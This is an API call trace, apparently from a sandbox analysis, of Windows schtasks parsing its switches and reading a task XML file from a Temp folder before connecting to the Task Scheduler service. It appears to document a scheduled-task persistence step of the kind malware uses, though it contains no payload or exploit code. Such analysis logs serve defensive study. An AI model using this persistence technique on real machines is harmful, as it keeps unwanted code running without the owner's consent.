[0220.601] lstrlenW (lpString="|du|") returned 4
[0220.601] lstrlenW (lpString="|f|") returned 3
[0220.601] StrStrIW (lpFirst="|du|", lpSrch="|f|") returned 0x0
[0220.601] SetLastError (dwErrCode=0x490)
[0220.601] lstrlenW (lpString="ri") returned 2
[0220.603] lstrlenW (lpString="ri") returned 2
[0220.603] _memicmp (_Buf1=0x2ec230, _Buf2=0xffe21b08, _Size=0x7) returned 0
[0220.603] lstrlenW (lpString="f") returned 1
[0220.603] _memicmp (_Buf1=0x2ec370, _Buf2=0xffe21b08, _Size=0x7) returned 0
[0220.604] _vsnwprintf (in: _Buffer=0x2ec3b0, _BufferCount=0x5, _Format="|%s|", _ArgList=0x18c318 | out: _Buffer="|ri|") returned 4
[0220.604] _vsnwprintf (in: _Buffer=0x2ec390, _BufferCount=0x4, _Format="|%s|", _ArgList=0x18c318 | out: _Buffer="|f|") returned 3
[0220.604] lstrlenW (lpString="|ri|") returned 4
[0220.604] lstrlenW (lpString="|f|") returned 3
[0220.604] StrStrIW (lpFirst="|ri|", lpSrch="|f|") returned 0x0
[0220.604] SetLastError (dwErrCode=0x490)
[0220.604] lstrlenW (lpString="z") returned 1
[0220.604] lstrlenW (lpString="z") returned 1
[0220.604] _memicmp (_Buf1=0x2ec230, _Buf2=0xffe21b08, _Size=0x7) returned 0
[0220.604] lstrlenW (lpString="f") returned 1
[0220.604] _memicmp (_Buf1=0x2ec370, _Buf2=0xffe21b08, _Size=0x7) returned 0
[0220.605] _vsnwprintf (in: _Buffer=0x2ec3b0, _BufferCount=0x4, _Format="|%s|", _ArgList=0x18c318 | out: _Buffer="|z|") returned 3
[0220.605] _vsnwprintf (in: _Buffer=0x2ec390, _BufferCount=0x4, _Format="|%s|", _ArgList=0x18c318 | out: _Buffer="|f|") returned 3
[0220.605] lstrlenW (lpString="|z|") returned 3
[0220.605] lstrlenW (lpString="|f|") returned 3
[0220.605] StrStrIW (lpFirst="|z|", lpSrch="|f|") returned 0x0
[0220.605] SetLastError (dwErrCode=0x490)
[0220.605] lstrlenW (lpString="f") returned 1
[0220.605] lstrlenW (lpString="f") returned 1
[0220.605] _memicmp (_Buf1=0x2ec230, _Buf2=0xffe21b08, _Size=0x7) returned 0
[0220.605] lstrlenW (lpString="f") returned 1
[0220.605] _memicmp (_Buf1=0x2ec370, _Buf2=0xffe21b08, _Size=0x7) returned 0
[0220.605] _vsnwprintf (in: _Buffer=0x2ec3b0, _BufferCount=0x4, _Format="|%s|", _ArgList=0x18c318 | out: _Buffer="|f|") returned 3
[0220.605] _vsnwprintf (in: _Buffer=0x2ec390, _BufferCount=0x4, _Format="|%s|", _ArgList=0x18c318 | out: _Buffer="|f|") returned 3
[0220.606] lstrlenW (lpString="|f|") returned 3
[0220.606] lstrlenW (lpString="|f|") returned 3
[0220.606] StrStrIW (lpFirst="|f|", lpSrch="|f|") returned="|f|"
[0220.606] SetLastError (dwErrCode=0x0)
[0220.606] SetLastError (dwErrCode=0x0)
[0220.606] SetLastError (dwErrCode=0x0)
[0220.606] lstrlenW (lpString="/XML") returned 4
[0220.606] lstrlenW (lpString="-/") returned 2
[0220.606] StrChrIW (lpStart="-/", wMatch=0x2f) returned="/"
[0220.606] lstrlenW (lpString="create") returned 6
[0220.606] lstrlenW (lpString="create") returned 6
[0220.606] _memicmp (_Buf1=0x2ec230, _Buf2=0xffe21b08, _Size=0x7) returned 0
[0220.606] lstrlenW (lpString="XML") returned 3
[0220.606] _memicmp (_Buf1=0x2ec370, _Buf2=0xffe21b08, _Size=0x7) returned 0
[0220.607] _vsnwprintf (in: _Buffer=0x2ec3b0, _BufferCount=0x9, _Format="|%s|", _ArgList=0x18c318 | out: _Buffer="|create|") returned 8
[0220.607] _vsnwprintf (in: _Buffer=0x2ec390, _BufferCount=0x6, _Format="|%s|", _ArgList=0x18c318 | out: _Buffer="|XML|") returned 5
[0220.607] lstrlenW (lpString="|create|") returned 8
[0220.607] lstrlenW (lpString="|XML|") returned 5
[0220.607] StrStrIW (lpFirst="|create|", lpSrch="|XML|") returned 0x0
[0220.607] SetLastError (dwErrCode=0x490)
[0220.607] lstrlenW (lpString="?") returned 1
[0220.607] lstrlenW (lpString="?") returned 1
[0220.607] _memicmp (_Buf1=0x2ec230, _Buf2=0xffe21b08, _Size=0x7) returned 0
[0220.607] lstrlenW (lpString="XML") returned 3
[0220.607] _memicmp (_Buf1=0x2ec370, _Buf2=0xffe21b08, _Size=0x7) returned 0
[0220.607] _vsnwprintf (in: _Buffer=0x2ec3b0, _BufferCount=0x4, _Format="|%s|", _ArgList=0x18c318 | out: _Buffer="|?|") returned 3
[0220.608] _vsnwprintf (in: _Buffer=0x2ec390, _BufferCount=0x6, _Format="|%s|", _ArgList=0x18c318 | out: _Buffer="|XML|") returned 5
[0220.608] lstrlenW (lpString="|?|") returned 3
[0220.608] lstrlenW (lpString="|XML|") returned 5
[0220.608] SetLastError (dwErrCode=0x490)
[0220.608] lstrlenW (lpString="s") returned 1
[0220.608] lstrlenW (lpString="s") returned 1
[0220.608] _memicmp (_Buf1=0x2ec230, _Buf2=0xffe21b08, _Size=0x7) returned 0
[0220.608] lstrlenW (lpString="XML") returned 3
[0220.608] _memicmp (_Buf1=0x2ec370, _Buf2=0xffe21b08, _Size=0x7) returned 0
[0220.608] _vsnwprintf (in: _Buffer=0x2ec3b0, _BufferCount=0x4, _Format="|%s|", _ArgList=0x18c318 | out: _Buffer="|s|") returned 3
[0220.608] _vsnwprintf (in: _Buffer=0x2ec390, _BufferCount=0x6, _Format="|%s|", _ArgList=0x18c318 | out: _Buffer="|XML|") returned 5
[0220.608] lstrlenW (lpString="|s|") returned 3
[0220.608] lstrlenW (lpString="|XML|") returned 5
[0220.609] SetLastError (dwErrCode=0x490)
[0220.609] lstrlenW (lpString="u") returned 1
[0220.609] lstrlenW (lpString="u") returned 1
[0220.609] _memicmp (_Buf1=0x2ec230, _Buf2=0xffe21b08, _Size=0x7) returned 0
[0220.609] lstrlenW (lpString="XML") returned 3
[0220.609] _memicmp (_Buf1=0x2ec370, _Buf2=0xffe21b08, _Size=0x7) returned 0
[0220.609] _vsnwprintf (in: _Buffer=0x2ec3b0, _BufferCount=0x4, _Format="|%s|", _ArgList=0x18c318 | out: _Buffer="|u|") returned 3
[0220.609] _vsnwprintf (in: _Buffer=0x2ec390, _BufferCount=0x6, _Format="|%s|", _ArgList=0x18c318 | out: _Buffer="|XML|") returned 5
[0220.609] lstrlenW (lpString="|u|") returned 3
[0220.609] lstrlenW (lpString="|XML|") returned 5
[0220.609] SetLastError (dwErrCode=0x490)
[0220.609] lstrlenW (lpString="p") returned 1
[0220.609] lstrlenW (lpString="p") returned 1
[0220.609] _memicmp (_Buf1=0x2ec230, _Buf2=0xffe21b08, _Size=0x7) returned 0
[0220.610] lstrlenW (lpString="XML") returned 3
[0220.610] _memicmp (_Buf1=0x2ec370, _Buf2=0xffe21b08, _Size=0x7) returned 0
[0220.610] _vsnwprintf (in: _Buffer=0x2ec3b0, _BufferCount=0x4, _Format="|%s|", _ArgList=0x18c318 | out: _Buffer="|p|") returned 3
[0220.610] _vsnwprintf (in: _Buffer=0x2ec390, _BufferCount=0x6, _Format="|%s|", _ArgList=0x18c318 | out: _Buffer="|XML|") returned 5
[0220.610] lstrlenW (lpString="|p|") returned 3
[0220.610] lstrlenW (lpString="|XML|") returned 5
[0220.610] SetLastError (dwErrCode=0x490)
[0220.610] lstrlenW (lpString="ru") returned 2
[0220.610] lstrlenW (lpString="ru") returned 2
[0220.610] _memicmp (_Buf1=0x2ec230, _Buf2=0xffe21b08, _Size=0x7) returned 0
[0220.610] lstrlenW (lpString="XML") returned 3
[0220.610] _memicmp (_Buf1=0x2ec370, _Buf2=0xffe21b08, _Size=0x7) returned 0
[0220.610] _vsnwprintf (in: _Buffer=0x2ec3b0, _BufferCount=0x5, _Format="|%s|", _ArgList=0x18c318 | out: _Buffer="|ru|") returned 4
[0220.611] _vsnwprintf (in: _Buffer=0x2ec390, _BufferCount=0x6, _Format="|%s|", _ArgList=0x18c318 | out: _Buffer="|XML|") returned 5
[0220.611] lstrlenW (lpString="|ru|") returned 4
[0220.611] lstrlenW (lpString="|XML|") returned 5
[0220.611] SetLastError (dwErrCode=0x490)
[0220.611] lstrlenW (lpString="rp") returned 2
[0220.611] lstrlenW (lpString="rp") returned 2
[0220.611] _memicmp (_Buf1=0x2ec230, _Buf2=0xffe21b08, _Size=0x7) returned 0
[0220.611] lstrlenW (lpString="XML") returned 3
[0220.611] _memicmp (_Buf1=0x2ec370, _Buf2=0xffe21b08, _Size=0x7) returned 0
[0220.611] _vsnwprintf (in: _Buffer=0x2ec3b0, _BufferCount=0x5, _Format="|%s|", _ArgList=0x18c318 | out: _Buffer="|rp|") returned 4
[0220.611] _vsnwprintf (in: _Buffer=0x2ec390, _BufferCount=0x6, _Format="|%s|", _ArgList=0x18c318 | out: _Buffer="|XML|") returned 5
[0220.611] lstrlenW (lpString="|rp|") returned 4
[0220.611] lstrlenW (lpString="|XML|") returned 5
[0220.611] SetLastError (dwErrCode=0x490)
[0220.612] lstrlenW (lpString="sc") returned 2
[0220.612] lstrlenW (lpString="sc") returned 2
[0220.612] _memicmp (_Buf1=0x2ec230, _Buf2=0xffe21b08, _Size=0x7) returned 0
[0220.612] lstrlenW (lpString="XML") returned 3
[0220.612] _memicmp (_Buf1=0x2ec370, _Buf2=0xffe21b08, _Size=0x7) returned 0
[0220.612] _vsnwprintf (in: _Buffer=0x2ec3b0, _BufferCount=0x5, _Format="|%s|", _ArgList=0x18c318 | out: _Buffer="|sc|") returned 4
[0220.612] _vsnwprintf (in: _Buffer=0x2ec390, _BufferCount=0x6, _Format="|%s|", _ArgList=0x18c318 | out: _Buffer="|XML|") returned 5
[0220.612] lstrlenW (lpString="|sc|") returned 4
[0220.612] lstrlenW (lpString="|XML|") returned 5
[0220.612] SetLastError (dwErrCode=0x490)
[0220.612] lstrlenW (lpString="mo") returned 2
[0220.612] lstrlenW (lpString="mo") returned 2
[0220.612] _memicmp (_Buf1=0x2ec230, _Buf2=0xffe21b08, _Size=0x7) returned 0
[0220.613] lstrlenW (lpString="XML") returned 3
[0220.613] _memicmp (_Buf1=0x2ec370, _Buf2=0xffe21b08, _Size=0x7) returned 0
[0220.613] _vsnwprintf (in: _Buffer=0x2ec3b0, _BufferCount=0x5, _Format="|%s|", _ArgList=0x18c318 | out: _Buffer="|mo|") returned 4
[0220.613] _vsnwprintf (in: _Buffer=0x2ec390, _BufferCount=0x6, _Format="|%s|", _ArgList=0x18c318 | out: _Buffer="|XML|") returned 5
[0220.613] lstrlenW (lpString="|mo|") returned 4
[0220.613] lstrlenW (lpString="|XML|") returned 5
[0220.613] SetLastError (dwErrCode=0x490)
[0220.613] lstrlenW (lpString="d") returned 1
[0220.613] lstrlenW (lpString="d") returned 1
[0220.613] _memicmp (_Buf1=0x2ec230, _Buf2=0xffe21b08, _Size=0x7) returned 0
[0220.613] lstrlenW (lpString="XML") returned 3
[0220.613] _memicmp (_Buf1=0x2ec370, _Buf2=0xffe21b08, _Size=0x7) returned 0
[0220.614] _vsnwprintf (in: _Buffer=0x2ec3b0, _BufferCount=0x4, _Format="|%s|", _ArgList=0x18c318 | out: _Buffer="|d|") returned 3
[0220.614] _vsnwprintf (in: _Buffer=0x2ec390, _BufferCount=0x6, _Format="|%s|", _ArgList=0x18c318 | out: _Buffer="|XML|") returned 5
[0220.614] lstrlenW (lpString="|d|") returned 3
[0220.614] lstrlenW (lpString="|XML|") returned 5
[0220.614] SetLastError (dwErrCode=0x490)
[0220.614] lstrlenW (lpString="m") returned 1
[0220.614] lstrlenW (lpString="m") returned 1
[0220.614] _memicmp (_Buf1=0x2ec230, _Buf2=0xffe21b08, _Size=0x7) returned 0
[0220.614] lstrlenW (lpString="XML") returned 3
[0220.614] _memicmp (_Buf1=0x2ec370, _Buf2=0xffe21b08, _Size=0x7) returned 0
[0220.614] _vsnwprintf (in: _Buffer=0x2ec3b0, _BufferCount=0x4, _Format="|%s|", _ArgList=0x18c318 | out: _Buffer="|m|") returned 3
[0220.614] _vsnwprintf (in: _Buffer=0x2ec390, _BufferCount=0x6, _Format="|%s|", _ArgList=0x18c318 | out: _Buffer="|XML|") returned 5
[0220.614] lstrlenW (lpString="|m|") returned 3
[0220.614] lstrlenW (lpString="|XML|") returned 5
[0220.615] SetLastError (dwErrCode=0x490)
[0220.615] lstrlenW (lpString="i") returned 1
[0220.615] lstrlenW (lpString="i") returned 1
[0220.615] _memicmp (_Buf1=0x2ec230, _Buf2=0xffe21b08, _Size=0x7) returned 0
[0220.615] lstrlenW (lpString="XML") returned 3
[0220.615] _memicmp (_Buf1=0x2ec370, _Buf2=0xffe21b08, _Size=0x7) returned 0
[0220.615] _vsnwprintf (in: _Buffer=0x2ec3b0, _BufferCount=0x4, _Format="|%s|", _ArgList=0x18c318 | out: _Buffer="|i|") returned 3
[0220.615] _vsnwprintf (in: _Buffer=0x2ec390, _BufferCount=0x6, _Format="|%s|", _ArgList=0x18c318 | out: _Buffer="|XML|") returned 5
[0220.615] lstrlenW (lpString="|i|") returned 3
[0220.615] lstrlenW (lpString="|XML|") returned 5
[0220.615] SetLastError (dwErrCode=0x490)
[0220.615] lstrlenW (lpString="tn") returned 2
[0220.615] lstrlenW (lpString="tn") returned 2
[0220.615] _memicmp (_Buf1=0x2ec230, _Buf2=0xffe21b08, _Size=0x7) returned 0
[0220.616] lstrlenW (lpString="XML") returned 3
[0220.616] _memicmp (_Buf1=0x2ec370, _Buf2=0xffe21b08, _Size=0x7) returned 0
[0220.616] _vsnwprintf (in: _Buffer=0x2ec3b0, _BufferCount=0x5, _Format="|%s|", _ArgList=0x18c318 | out: _Buffer="|tn|") returned 4
[0220.616] _vsnwprintf (in: _Buffer=0x2ec390, _BufferCount=0x6, _Format="|%s|", _ArgList=0x18c318 | out: _Buffer="|XML|") returned 5
[0220.616] lstrlenW (lpString="|tn|") returned 4
[0220.616] lstrlenW (lpString="|XML|") returned 5
[0220.616] SetLastError (dwErrCode=0x490)
[0220.616] lstrlenW (lpString="tr") returned 2
[0220.616] lstrlenW (lpString="tr") returned 2
[0220.616] _memicmp (_Buf1=0x2ec230, _Buf2=0xffe21b08, _Size=0x7) returned 0
[0220.616] lstrlenW (lpString="XML") returned 3
[0220.616] _memicmp (_Buf1=0x2ec370, _Buf2=0xffe21b08, _Size=0x7) returned 0
[0220.617] _vsnwprintf (in: _Buffer=0x2ec3b0, _BufferCount=0x5, _Format="|%s|", _ArgList=0x18c318 | out: _Buffer="|tr|") returned 4
[0220.617] _vsnwprintf (in: _Buffer=0x2ec390, _BufferCount=0x6, _Format="|%s|", _ArgList=0x18c318 | out: _Buffer="|XML|") returned 5
[0220.617] lstrlenW (lpString="|tr|") returned 4
[0220.617] lstrlenW (lpString="|XML|") returned 5
[0220.617] SetLastError (dwErrCode=0x490)
[0220.617] lstrlenW (lpString="st") returned 2
[0220.617] lstrlenW (lpString="st") returned 2
[0220.617] _memicmp (_Buf1=0x2ec230, _Buf2=0xffe21b08, _Size=0x7) returned 0
[0220.743] lstrlenW (lpString="XML") returned 3
[0220.743] _memicmp (_Buf1=0x2ec370, _Buf2=0xffe21b08, _Size=0x7) returned 0
[0220.743] _vsnwprintf (in: _Buffer=0x2ec3b0, _BufferCount=0x5, _Format="|%s|", _ArgList=0x18c318 | out: _Buffer="|st|") returned 4
[0220.743] _vsnwprintf (in: _Buffer=0x2ec390, _BufferCount=0x6, _Format="|%s|", _ArgList=0x18c318 | out: _Buffer="|XML|") returned 5
[0220.743] lstrlenW (lpString="|st|") returned 4
[0220.743] lstrlenW (lpString="|XML|") returned 5
[0220.743] SetLastError (dwErrCode=0x490)
[0220.743] lstrlenW (lpString="sd") returned 2
[0220.743] lstrlenW (lpString="sd") returned 2
[0220.743] _memicmp (_Buf1=0x2ec230, _Buf2=0xffe21b08, _Size=0x7) returned 0
[0220.744] lstrlenW (lpString="XML") returned 3
[0220.744] _memicmp (_Buf1=0x2ec370, _Buf2=0xffe21b08, _Size=0x7) returned 0
[0220.744] _vsnwprintf (in: _Buffer=0x2ec3b0, _BufferCount=0x5, _Format="|%s|", _ArgList=0x18c318 | out: _Buffer="|sd|") returned 4
[0220.744] _vsnwprintf (in: _Buffer=0x2ec390, _BufferCount=0x6, _Format="|%s|", _ArgList=0x18c318 | out: _Buffer="|XML|") returned 5
[0220.744] lstrlenW (lpString="|sd|") returned 4
[0220.744] lstrlenW (lpString="|XML|") returned 5
[0220.744] SetLastError (dwErrCode=0x490)
[0220.744] lstrlenW (lpString="ed") returned 2
[0220.744] lstrlenW (lpString="ed") returned 2
[0220.744] _memicmp (_Buf1=0x2ec230, _Buf2=0xffe21b08, _Size=0x7) returned 0
[0220.744] lstrlenW (lpString="XML") returned 3
[0220.744] _memicmp (_Buf1=0x2ec370, _Buf2=0xffe21b08, _Size=0x7) returned 0
[0220.744] _vsnwprintf (in: _Buffer=0x2ec3b0, _BufferCount=0x5, _Format="|%s|", _ArgList=0x18c318 | out: _Buffer="|ed|") returned 4
[0220.745] _vsnwprintf (in: _Buffer=0x2ec390, _BufferCount=0x6, _Format="|%s|", _ArgList=0x18c318 | out: _Buffer="|XML|") returned 5
[0220.745] lstrlenW (lpString="|ed|") returned 4
[0220.745] lstrlenW (lpString="|XML|") returned 5
[0220.745] SetLastError (dwErrCode=0x490)
[0220.745] lstrlenW (lpString="it") returned 2
[0220.745] lstrlenW (lpString="it") returned 2
[0220.745] _memicmp (_Buf1=0x2ec230, _Buf2=0xffe21b08, _Size=0x7) returned 0
[0220.745] lstrlenW (lpString="XML") returned 3
[0220.745] _memicmp (_Buf1=0x2ec370, _Buf2=0xffe21b08, _Size=0x7) returned 0
[0220.745] _vsnwprintf (in: _Buffer=0x2ec3b0, _BufferCount=0x5, _Format="|%s|", _ArgList=0x18c318 | out: _Buffer="|it|") returned 4
[0220.745] _vsnwprintf (in: _Buffer=0x2ec390, _BufferCount=0x6, _Format="|%s|", _ArgList=0x18c318 | out: _Buffer="|XML|") returned 5
[0220.745] lstrlenW (lpString="|it|") returned 4
[0220.745] lstrlenW (lpString="|XML|") returned 5
[0220.745] SetLastError (dwErrCode=0x490)
[0220.746] lstrlenW (lpString="et") returned 2
[0220.746] lstrlenW (lpString="et") returned 2
[0220.746] _memicmp (_Buf1=0x2ec230, _Buf2=0xffe21b08, _Size=0x7) returned 0
[0220.746] lstrlenW (lpString="XML") returned 3
[0220.746] _memicmp (_Buf1=0x2ec370, _Buf2=0xffe21b08, _Size=0x7) returned 0
[0220.746] _vsnwprintf (in: _Buffer=0x2ec3b0, _BufferCount=0x5, _Format="|%s|", _ArgList=0x18c318 | out: _Buffer="|et|") returned 4
[0220.746] _vsnwprintf (in: _Buffer=0x2ec390, _BufferCount=0x6, _Format="|%s|", _ArgList=0x18c318 | out: _Buffer="|XML|") returned 5
[0220.746] lstrlenW (lpString="|et|") returned 4
[0220.746] lstrlenW (lpString="|XML|") returned 5
[0220.746] SetLastError (dwErrCode=0x490)
[0220.746] lstrlenW (lpString="k") returned 1
[0220.746] lstrlenW (lpString="k") returned 1
[0220.746] _memicmp (_Buf1=0x2ec230, _Buf2=0xffe21b08, _Size=0x7) returned 0
[0220.746] lstrlenW (lpString="XML") returned 3
[0220.747] _memicmp (_Buf1=0x2ec370, _Buf2=0xffe21b08, _Size=0x7) returned 0
[0220.747] _vsnwprintf (in: _Buffer=0x2ec3b0, _BufferCount=0x4, _Format="|%s|", _ArgList=0x18c318 | out: _Buffer="|k|") returned 3
[0220.747] _vsnwprintf (in: _Buffer=0x2ec390, _BufferCount=0x6, _Format="|%s|", _ArgList=0x18c318 | out: _Buffer="|XML|") returned 5
[0220.747] lstrlenW (lpString="|k|") returned 3
[0220.747] lstrlenW (lpString="|XML|") returned 5
[0220.747] SetLastError (dwErrCode=0x490)
[0220.747] lstrlenW (lpString="du") returned 2
[0220.747] lstrlenW (lpString="du") returned 2
[0220.747] _memicmp (_Buf1=0x2ec230, _Buf2=0xffe21b08, _Size=0x7) returned 0
[0220.747] lstrlenW (lpString="XML") returned 3
[0220.747] _memicmp (_Buf1=0x2ec370, _Buf2=0xffe21b08, _Size=0x7) returned 0
[0220.747] _vsnwprintf (in: _Buffer=0x2ec3b0, _BufferCount=0x5, _Format="|%s|", _ArgList=0x18c318 | out: _Buffer="|du|") returned 4
[0220.747] _vsnwprintf (in: _Buffer=0x2ec390, _BufferCount=0x6, _Format="|%s|", _ArgList=0x18c318 | out: _Buffer="|XML|") returned 5
[0220.748] lstrlenW (lpString="|du|") returned 4
[0220.748] lstrlenW (lpString="|XML|") returned 5
[0220.748] SetLastError (dwErrCode=0x490)
[0220.748] lstrlenW (lpString="ri") returned 2
[0220.748] lstrlenW (lpString="ri") returned 2
[0220.748] _memicmp (_Buf1=0x2ec230, _Buf2=0xffe21b08, _Size=0x7) returned 0
[0220.748] lstrlenW (lpString="XML") returned 3
[0220.748] _memicmp (_Buf1=0x2ec370, _Buf2=0xffe21b08, _Size=0x7) returned 0
[0220.748] _vsnwprintf (in: _Buffer=0x2ec3b0, _BufferCount=0x5, _Format="|%s|", _ArgList=0x18c318 | out: _Buffer="|ri|") returned 4
[0220.748] _vsnwprintf (in: _Buffer=0x2ec390, _BufferCount=0x6, _Format="|%s|", _ArgList=0x18c318 | out: _Buffer="|XML|") returned 5
[0220.748] lstrlenW (lpString="|ri|") returned 4
[0220.748] lstrlenW (lpString="|XML|") returned 5
[0220.748] SetLastError (dwErrCode=0x490)
[0220.748] lstrlenW (lpString="z") returned 1
[0220.748] lstrlenW (lpString="z") returned 1
[0220.749] _memicmp (_Buf1=0x2ec230, _Buf2=0xffe21b08, _Size=0x7) returned 0
[0220.749] lstrlenW (lpString="XML") returned 3
[0220.749] _memicmp (_Buf1=0x2ec370, _Buf2=0xffe21b08, _Size=0x7) returned 0
[0220.749] _vsnwprintf (in: _Buffer=0x2ec3b0, _BufferCount=0x4, _Format="|%s|", _ArgList=0x18c318 | out: _Buffer="|z|") returned 3
[0220.749] _vsnwprintf (in: _Buffer=0x2ec390, _BufferCount=0x6, _Format="|%s|", _ArgList=0x18c318 | out: _Buffer="|XML|") returned 5
[0220.749] lstrlenW (lpString="|z|") returned 3
[0220.749] lstrlenW (lpString="|XML|") returned 5
[0220.749] SetLastError (dwErrCode=0x490)
[0220.749] lstrlenW (lpString="f") returned 1
[0220.749] lstrlenW (lpString="f") returned 1
[0220.749] _memicmp (_Buf1=0x2ec230, _Buf2=0xffe21b08, _Size=0x7) returned 0
[0220.749] lstrlenW (lpString="XML") returned 3
[0220.750] _memicmp (_Buf1=0x2ec370, _Buf2=0xffe21b08, _Size=0x7) returned 0
[0220.750] _vsnwprintf (in: _Buffer=0x2ec3b0, _BufferCount=0x4, _Format="|%s|", _ArgList=0x18c318 | out: _Buffer="|f|") returned 3
[0220.750] _vsnwprintf (in: _Buffer=0x2ec390, _BufferCount=0x6, _Format="|%s|", _ArgList=0x18c318 | out: _Buffer="|XML|") returned 5
[0220.750] lstrlenW (lpString="|f|") returned 3
[0220.750] lstrlenW (lpString="|XML|") returned 5
[0220.750] SetLastError (dwErrCode=0x490)
[0220.750] lstrlenW (lpString="v1") returned 2
[0220.750] lstrlenW (lpString="v1") returned 2
[0220.750] _memicmp (_Buf1=0x2ec230, _Buf2=0xffe21b08, _Size=0x7) returned 0
[0220.750] lstrlenW (lpString="XML") returned 3
[0220.750] _memicmp (_Buf1=0x2ec370, _Buf2=0xffe21b08, _Size=0x7) returned 0
[0220.750] _vsnwprintf (in: _Buffer=0x2ec3b0, _BufferCount=0x5, _Format="|%s|", _ArgList=0x18c318 | out: _Buffer="|v1|") returned 4
[0220.751] _vsnwprintf (in: _Buffer=0x2ec390, _BufferCount=0x6, _Format="|%s|", _ArgList=0x18c318 | out: _Buffer="|XML|") returned 5
[0220.751] lstrlenW (lpString="|v1|") returned 4
[0220.751] lstrlenW (lpString="|XML|") returned 5
[0220.751] SetLastError (dwErrCode=0x490)
[0220.751] lstrlenW (lpString="xml") returned 3
[0220.751] lstrlenW (lpString="xml") returned 3
[0220.751] _memicmp (_Buf1=0x2ec230, _Buf2=0xffe21b08, _Size=0x7) returned 0
[0220.751] lstrlenW (lpString="XML") returned 3
[0220.751] _memicmp (_Buf1=0x2ec370, _Buf2=0xffe21b08, _Size=0x7) returned 0
[0220.751] _vsnwprintf (in: _Buffer=0x2ec3b0, _BufferCount=0x6, _Format="|%s|", _ArgList=0x18c318 | out: _Buffer="|xml|") returned 5
[0220.751] _vsnwprintf (in: _Buffer=0x2ec390, _BufferCount=0x6, _Format="|%s|", _ArgList=0x18c318 | out: _Buffer="|XML|") returned 5
[0220.751] lstrlenW (lpString="|xml|") returned 5
[0220.751] lstrlenW (lpString="|XML|") returned 5
[0220.751] StrStrIW (lpFirst="|xml|", lpSrch="|XML|") returned="|xml|"
[0220.751] SetLastError (dwErrCode=0x0)
[0220.751] SetLastError (dwErrCode=0x0)
[0220.752] lstrlenW (lpString="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\Z11.xml") returned 44
[0220.752] lstrlenW (lpString="-/") returned 2
[0220.752] StrChrIW (lpStart="-/", wMatch=0x43) returned 0x0
[0220.752] SetLastError (dwErrCode=0x490)
[0220.752] SetLastError (dwErrCode=0x490)
[0220.752] SetLastError (dwErrCode=0x0)
[0220.752] lstrlenW (lpString="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\Z11.xml") returned 44
[0220.752] StrChrIW (lpStart="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\Z11.xml", wMatch=0x3a) returned=":\\Users\\KEECFM~1\\AppData\\Local\\Temp\\Z11.xml"
[0220.752] lstrlenW (lpString="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\Z11.xml") returned 44
[0220.752] _memicmp (_Buf1=0x2ec440, _Buf2=0xffe21b08, _Size=0x7) returned 0
[0220.752] _memicmp (_Buf1=0x2ed670, _Buf2=0xffe21b08, _Size=0x7) returned 0
[0220.752] SetLastError (dwErrCode=0x7a)
[0220.752] SetLastError (dwErrCode=0x0)
[0220.752] SetLastError (dwErrCode=0x0)
[0220.752] lstrlenW (lpString="C") returned 1
[0220.753] SetLastError (dwErrCode=0x490)
[0220.753] SetLastError (dwErrCode=0x0)
[0220.753] lstrlenW (lpString="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\Z11.xml") returned 44
[0220.753] lstrlenW (lpString="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\Z11.xml") returned 44
[0220.753] GetProcessHeap () returned 0x2d0000
[0220.753] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0xc, Size=0x5a) returned 0x2ec480
[0220.753] SetLastError (dwErrCode=0x0)
[0220.753] lstrlenW (lpString="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\Z11.xml") returned 44
[0220.753] SetLastError (dwErrCode=0x0)
[0220.753] GetProcessHeap () returned 0x2d0000
[0220.754] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0xc, Size=0x1fc) returned 0x2ec4f0
[0220.915] CoInitializeEx (pvReserved=0x0, dwCoInit=0x2) returned 0x0
[0221.197] CoInitializeSecurity (pSecDesc=0x0, cAuthSvc=-1, asAuthSvc=0x0, pReserved1=0x0, dwAuthnLevel=0x1, dwImpLevel=0x3, pAuthList=0x0, dwCapabilities=0x0, pReserved3=0x0) returned 0x0
[0221.572] CoCreateInstance (in: rclsid=0xffe21ae0*(Data1=0xf87369f, Data2=0xa4e5, Data3=0x4cfc, Data4=([0]=0xbd, [1]=0x3e, [2]=0x73, [3]=0xe6, [4]=0x15, [5]=0x45, [6]=0x72, [7]=0xdd)), pUnkOuter=0x0, dwClsContext=0x17, riid=0xffe21ad0*(Data1=0x2faba4c7, Data2=0x4da9, Data3=0x4013, Data4=([0]=0x96, [1]=0x97, [2]=0x20, [3]=0xcc, [4]=0x3f, [5]=0xd4, [6]=0xf, [7]=0x85)), ppv=0x18ca60 | out: ppv=0x18ca60*=0xd5a70) returned 0x0
[0221.716] TaskScheduler:ITaskService:Connect (This=0xd5a70, serverName=0x18cb40*(varType=0x8, wReserved1=0x18, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), user=0x18cb00*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x32524553524150), domain=0x18cb20*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), password=0x18cae0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0xc0, varVal2=0x1)) returned 0x0
[0221.842] TaskScheduler:IUnknown:AddRef (This=0xd5a70) returned 0x2
[0221.842] TaskScheduler:ITaskService:GetFolder (in: This=0xd5a70, Path=0x0, ppFolder=0x18cbf8 | out: ppFolder=0x18cbf8*=0xd5b20) returned 0x0
[0221.845] CreateFileW (lpFileName="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\Z11.xml" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\temp\\z11.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x5, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8000080, hTemplateFile=0x0) returned 0xf4
[0221.846] GetFileSizeEx (in: hFile=0xf4, lpFileSize=0x18c3f0 | out: lpFileSize=0x18c3f0*=1788) returned 1
